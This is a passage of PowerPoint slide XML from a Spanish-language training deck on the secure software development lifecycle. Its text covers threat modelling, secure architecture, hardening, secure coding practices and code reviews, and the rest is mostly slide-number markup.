            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Por esto, aquellas empresas y entidades que apliquen medidas para hacerles frente de forma anticipada y detenerlas a tiempo o, establezcan acciones correctivas que aíslen y expulsen esa amenaza, generarán confianza en sus clientes, proveedores y en el mercado en general.</a:t>
            </a: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E48F5BD5-5E7B-F1E7-24EE-F7592D9F734F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3797096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AB8C-13ED-69AA-7912-DE76EC73059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5F75E7-A126-B2EE-8C02-359ACCC4908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1AD5358-508E-EBB8-A513-419E3FFD4643}"/>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AB71BA03-7739-EB66-07CD-144326415DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3010014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B83B5-1C85-9ABD-3430-92F5C1ECFFE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EF2667-94A0-0774-5585-BF685EFB68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EBE5164-5255-7996-EAEC-23E329FEB204}"/>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67874224-9E8C-D695-CB5B-9D35E31CFF05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191857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80CB6-EF53-5AD3-4905-423A62C9F1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EEBF9D-DC8E-FF24-7F99-F28480310E7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2D4E6FF-36DE-BEEC-20EE-E7D5E13C3E70}"/>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E827C2F5-7BB9-E5D6-89D5-6E34D5862698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1623270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1863D-869D-628A-B72C-A542A173780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E7A07A-6391-A4F5-C8BC-55BBC5D0E27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067603-C1D3-7FDD-2AD0-89BAD90CB519}"/>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6202FDAC-B7DD-A348-0BB2-45BAD0920B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="703323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85C57-D3B8-9ABA-99FD-943D06114D1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4F43615-94CF-05E2-FF0B-F4EEA20CB08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0094CCC-BA89-97AF-40DF-0C4BA135BD7A}"/>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9E0E8824-4307-A5D5-1E00-CCF3FD762B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3909367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FEA4B-3E5E-827A-0971-3257BC2C6E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8F413D-D52D-1004-BCC4-B4379F2ECCB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623C90-A29F-4B73-B87F-40C2E0EEC803}"/>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EACA31F6-E73A-3911-8F68-AE51FD5661FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2709849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F66DC-5C95-2AA6-D76B-7B043997FE2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EB19BE-CE34-DFBA-83C0-98DC0EF1249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47EA551-F7AC-1F70-2EEA-92115168F17E}"/>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8786C7AF-1A5C-8B2F-E0EE-E6104BDA1045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2319754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E6C10-0E35-235B-4C0C-E631E92B842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325518E-A6CB-02A7-4F47-39EAD877BD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A35B3E-48A8-54A0-F322-C6741421C28A}"/>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AD0B63B3-8A3A-F606-A0B7-069FF8EB625F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102880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2D4D-AD11-D172-108D-1A44DF1BC2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B612DE0-8F4F-FE30-92D3-C864352396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467D30-27D9-D34D-9541-A8E1CA66B517}"/>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327D8D6-75FA-3B99-CC4C-8E458D0A6BB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4257191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130E7-F43F-4103-B8E8-6CE7725D46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5129880-2DE1-B48E-DA3E-13F3DEDCDC8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54CA674-C07E-7D66-A239-8DEE8BDCD13B}"/>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A3B2D8BF-1CC0-5AF7-C5B2-F8BEBBCCA6EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="870383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243-BA68-EC43-47E1-96846826E7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0DCC8E-C375-FE3E-5013-5337CAD214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CA1C40C-1A7D-B6FB-C83B-550B2228A71C}"/>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939BA5E1-223B-FF1E-C4FA-8DDED30925F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4279783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92F86-1DFC-4348-EE82-3847700B561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0DA666-E189-FD00-9580-27E68EA8E20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B392E00-E3BB-B9D4-A24C-B9570F1834B2}"/>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7C3F4BF3-83C2-354D-E3B4-826C25B2EB88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2166140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6031A-F826-6F1A-4828-60AA7F599C7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A484556-8178-AB76-3C41-916AF79B3A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B711E92-5917-8DC2-3C7E-B1EBC6AB131A}"/>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60819997-8F8D-9CC8-3E20-C51D85FBFCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2386289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90268-8FA7-C9A9-038D-AB6DFDA4BE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CE4B66E-FBD7-D2D4-D1F8-3154EC8C97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2D63885-830A-7E0A-63E3-256DF866E21A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En esta diapositiva, exploraremos el Ciclo de Vida Tradicional de Desarrollo de Software, también conocido como S-SDLC, y cómo podemos optimizar el control de seguridad en cada fase de este proceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Vamos a analizar cómo adaptar el control de seguridad de manera óptima a cada etapa del S-SDLC.</a:t>
            </a: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6A079316-F765-A1F8-E627-4E486FAAC258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2272341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1F74-2EC1-2571-D3DE-04CBC882B1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661968-C0C5-E5F2-81BD-EDBBC374F42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F99DC7F-642E-913D-CA72-EA26FE7AC2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effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dejar clara la idea de que No se introducen nuevas fases sino Buenas Prácticas</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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2E4611D4-2809-A586-A2AF-377776AF92B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="513174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EE40D-D644-D1E8-F523-9E4E90C2B6F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BE2F1E-991A-3394-FC28-63BE9100D9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DBB473-5E82-39FD-C5BB-D3D18CE5DD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effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dejar clara la idea de que No se introducen nuevas fases sino Buenas Prácticas</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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F7F7CC98-C944-1A6D-FDA5-5AEAAB8E4120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1431803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BBF2B-C369-A243-B34C-99B81C16A44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549981-3558-6BCD-7958-6EFB49B28BD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179311-C92E-12D5-42F1-428B339328E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Arquitectura Segura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Diseña una arquitectura segura que incluya mecanismos de seguridad apropiados, como firewalls, sistemas de autenticación y autorización, y comunicación segura.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Modelado de Amenazas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Realiza un modelo de amenazas para identificar y abordar posibles amenazas y riesgos en el diseño.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bastionado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Determinar la configuración segura (puertos, identificación componentes, etc.).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446087D8-B650-D54F-9C9E-D234E2705F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2001256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36E01-DBB0-EC9E-2E5C-565A67A0DC7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C6C4793-565E-BF79-21EA-623F7A2A091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8638C56-7BF4-6AD3-3943-9F769A7A7D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Código Seguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Aplica buenas prácticas de codificación segura, como evitar la inyección de SQL, la validación de entradas, el control de acceso adecuado y el manejo seguro de sesiones.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Revisiones de Código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Realiza revisiones de código regulares para asegurarte de que el código cumple con las políticas de seguridad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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212BFAF-050F-2A46-7E1A-4016405DE59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
